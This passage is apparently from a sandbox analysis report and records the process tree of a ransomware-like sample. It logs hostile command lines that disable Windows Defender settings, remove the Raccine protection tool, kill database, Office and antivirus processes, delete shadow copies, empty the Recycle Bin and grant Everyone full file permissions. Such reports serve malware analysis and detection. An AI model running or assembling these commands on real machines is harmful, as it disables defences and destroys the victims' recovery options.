  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:4180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4600
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4716
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:4132
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:2340
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:4756
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:4764
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1184
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:4992
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:4928
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:4848
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:4484
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1232
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:4336
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:4740
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:4756
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:1184
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:4344
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4216
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:1704
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:4508
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:1232
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:976
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:1496
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:1324
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:2732
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:4380
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:916
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4740
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:5092
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:5108
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:4452
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:1164
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:4588
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:4540
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:1344
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:1496
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:4204
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4848
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:4372
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:4132
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:4240
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:2472
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:4484
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:4172
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:4800
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:4308
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:4584
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:3976
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:4744
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:4144
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:4316
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:2260
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:4684
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:4644
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4564
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:5032
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4476
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:4332
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4420
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:4884
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:4396
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:3680
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4836
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:4212
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:2732
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  PID:1976
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  PID:4832
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  PID:4224
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4180
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:4860
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  PID:4844
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:5100
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  PID:4244
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  PID:3892
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:4452
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4484
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp8137.bat
  2⤵
  PID:4732
- - C:\Windows\system32\mountvol.exe
    mountvol
    3⤵
    PID:1840
- - C:\Windows\system32\find.exe
    find "}\"
    3⤵
    PID:2300
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{d05cfc4a-0000-0000-0000-500600000000}\
    3⤵
    PID:4056
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:4044
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{d05cfc4a-0000-0000-0000-100000000000}\
    3⤵
    PID:888
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:5000
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{7ee95057-98a6-11eb-b2cf-806e6f6e6963}\
    3⤵
    PID:3456
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:1540
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:5056
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\UnpublishReset.mov /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4532
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4408
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4328
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2216
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2832
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2104
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_000_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2340
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5036
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4272
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4292
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3680
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4212
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3780
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2856
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5040
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4712
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4696
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:460
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3492
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:748
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4896
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4460
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04082021-121055-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04082021-121224-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4320
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04082021-121504-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:916
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04082021-121711-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1804
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5096
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04082021-121055.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1864
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04082021-121055.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4296
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04082021-121055-00000003-ffffffff.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5068
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-41BB838CD7DD9EB515C54B7D92875CBD41632034.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4192
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-41BB838CD7DD9EB515C54B7D92875CBD41632034.bin.80 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5004
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-41BB838CD7DD9EB515C54B7D92875CBD41632034.bin.83 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4656
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-41BB838CD7DD9EB515C54B7D92875CBD41632034.bin.A0 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4668
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\MpDiag.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3632
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpenginedb.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:988
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\22\109003 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1240
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\21\260 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4160
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\272 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4872
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\328 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4868
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4548
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:136
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\109002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\109001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\193 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3844
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\15\262 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3068
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\11\200 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4312
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\05\191 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4128
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\198 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1336
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\271 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:716
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\00\192 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3908
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4340
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4964
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java Development Kit\Reference Documentation.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4364
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1428
- C:\Windows\SYSTEM32\icacls.exe
